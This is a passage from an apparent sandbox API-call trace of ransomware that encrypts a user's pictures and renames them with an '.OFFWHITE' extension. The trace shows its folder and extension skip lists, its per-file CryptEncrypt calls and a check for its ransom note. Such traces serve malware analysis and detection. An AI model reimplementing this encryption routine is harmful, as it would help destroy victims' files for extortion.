[0135.903] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.903] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.903] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.903] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.903] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.903] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.904] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.904] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.904] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.904] SetLastError (dwErrCode=0x0) [0135.904] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.906] GetLastError () returned 0x0 [0135.906] GetLastError () returned 0x0 [0135.906] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd820, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.907] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.907] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.907] WriteFile (in: hFile=0xb0, lpBuffer=0x521fa0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521fa0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.907] GetProcessHeap () returned 0x500000 [0135.907] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd720) returned 0x55a7b8 [0135.907] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.907] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xd720, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xd720, lpOverlapped=0x0) returned 1 [0135.911] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.911] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xd720, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xd720, lpOverlapped=0x0) returned 1 [0135.911] GetProcessHeap () returned 0x500000 [0135.912] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.912] CloseHandle (hObject=0xb0) returned 1 [0135.918] GetProcessHeap () returned 0x500000 [0135.918] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.918] GetProcessHeap () returned 0x500000 [0135.918] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.918] GetProcessHeap () returned 0x500000 [0135.918] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.918] GetProcessHeap () returned 0x500000 [0135.918] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.918] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg" [0135.918] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg.OFFWHITE" [0135.918] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sm fyd56uioxa0vt.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sm fyd56uioxa0vt.jpg.offwhite")) returned 1 [0135.919] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff167bb0, ftCreationTime.dwHighDateTime=0x1d5da75, ftLastAccessTime.dwLowDateTime=0xe84f4860, ftLastAccessTime.dwHighDateTime=0x1d5d987, ftLastWriteTime.dwLowDateTime=0xe84f4860, ftLastWriteTime.dwHighDateTime=0x1d5d987, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Whqyq9.jpg", cAlternateFileName="")) returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2=".") returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="..") returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="...") returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="windows") returned -1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="$recycle.bin") returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="rsa") returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="ntuser.dat") returned 1 [0135.919] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="programdata") returned 1 [0135.920] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="appdata") returned 1 [0135.920] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="program files") returned 1 [0135.920] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="program files (x86)") returned 1 [0135.920] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.920] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Whqyq9.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg" [0135.920] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.920] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.920] PathFindExtensionW (pszPath="Whqyq9.jpg") returned=".jpg" [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.920] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.920] lstrcmpiW (lpString1="Whqyq9.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.920] GetProcessHeap () returned 0x500000 [0135.920] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521fb0 [0135.921] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\whqyq9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.921] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=14198) returned 1 [0135.921] GetProcessHeap () returned 0x500000 [0135.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.921] GetProcessHeap () returned 0x500000 [0135.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.921] GetProcessHeap () returned 0x500000 [0135.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.921] GetProcessHeap () returned 0x500000 [0135.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.921] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.921] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.921] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.921] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.921] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.921] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.921] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.922] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.922] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.922] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.922] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.922] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.922] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3776, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.922] SetLastError (dwErrCode=0x0) [0135.922] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.924] GetLastError () returned 0x0 [0135.924] GetLastError () returned 0x0 [0135.924] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3876, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.924] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.925] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3976, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.925] WriteFile (in: hFile=0xb0, lpBuffer=0x521fb0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521fb0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.925] GetProcessHeap () returned 0x500000 [0135.925] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3776) returned 0x55a7b8 [0135.925] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.925] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x3776, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x3776, lpOverlapped=0x0) returned 1 [0135.926] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.927] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x3776, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x3776, lpOverlapped=0x0) returned 1 [0135.927] GetProcessHeap () returned 0x500000 [0135.927] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.927] CloseHandle (hObject=0xb0) returned 1 [0135.929] GetProcessHeap () returned 0x500000 [0135.929] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.929] GetProcessHeap () returned 0x500000 [0135.929] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.929] GetProcessHeap () returned 0x500000 [0135.929] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.929] GetProcessHeap () returned 0x500000 [0135.929] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.929] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg" [0135.929] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg.OFFWHITE" [0135.929] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\whqyq9.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Whqyq9.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\whqyq9.jpg.offwhite")) returned 1 [0135.930] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff167bb0, ftCreationTime.dwHighDateTime=0x1d5da75, ftLastAccessTime.dwLowDateTime=0xe84f4860, ftLastAccessTime.dwHighDateTime=0x1d5d987, ftLastWriteTime.dwLowDateTime=0xe84f4860, ftLastWriteTime.dwHighDateTime=0x1d5d987, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Whqyq9.jpg", cAlternateFileName="")) returned 0 [0135.930] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0135.930] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0135.930] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0135.930] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0135.930] lstrcmpiW (lpString1="PrintHood", lpString2="...") returned 1 [0135.930] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0135.930] lstrcmpiW (lpString1="PrintHood", lpString2="$recycle.bin") returned 1 [0135.931] lstrcmpiW (lpString1="PrintHood", lpString2="rsa") returned -1 [0135.931] lstrcmpiW (lpString1="PrintHood", lpString2="ntuser.dat") returned 1 [0135.931] lstrcmpiW (lpString1="PrintHood", lpString2="programdata") returned -1 [0135.931] lstrcmpiW (lpString1="PrintHood", lpString2="appdata") returned 1 [0135.931] lstrcmpiW (lpString1="PrintHood", lpString2="program files") returned -1 [0135.931] lstrcmpiW (lpString1="PrintHood", lpString2="program files (x86)") returned -1 [0135.931] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.931] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0135.931] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0135.931] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0135.931] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0135.931] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff167bb0, ftCreationTime.dwHighDateTime=0x1d5da75, ftLastAccessTime.dwLowDateTime=0xe84f4860, ftLastAccessTime.dwHighDateTime=0x1d5d987, ftLastWriteTime.dwLowDateTime=0xe84f4860, ftLastWriteTime.dwHighDateTime=0x1d5d987, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Whqyq9.jpg", cAlternateFileName="")) returned 0xffffffff [0135.931] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Recent", cAlternateFileName="")) returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="...") returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="$recycle.bin") returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="rsa") returned -1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="ntuser.dat") returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="programdata") returned 1 [0135.931] lstrcmpiW (lpString1="Recent", lpString2="appdata") returned 1 [0135.932] lstrcmpiW (lpString1="Recent", lpString2="program files") returned 1 [0135.932] lstrcmpiW (lpString1="Recent", lpString2="program files (x86)") returned 1 [0135.932] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.932] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0135.932] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0135.932] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0135.932] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0135.932] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff167bb0, ftCreationTime.dwHighDateTime=0x1d5da75, ftLastAccessTime.dwLowDateTime=0xe84f4860, ftLastAccessTime.dwHighDateTime=0x1d5d987, ftLastWriteTime.dwLowDateTime=0xe84f4860, ftLastWriteTime.dwHighDateTime=0x1d5d987, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Whqyq9.jpg", cAlternateFileName="")) returned 0xffffffff [0135.932] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="...") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="$recycle.bin") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="rsa") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="ntuser.dat") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="programdata") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="appdata") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="program files") returned 1 [0135.932] lstrcmpiW (lpString1="Saved Games", lpString2="program files (x86)") returned 1 [0135.932] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.932] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0135.933] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0135.933] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0135.933] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0135.933] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName=".", cAlternateFileName="")) returned 0x544610 [0135.933] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.933] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="..", cAlternateFileName="")) returned 1 [0135.933] lstrcmpiW 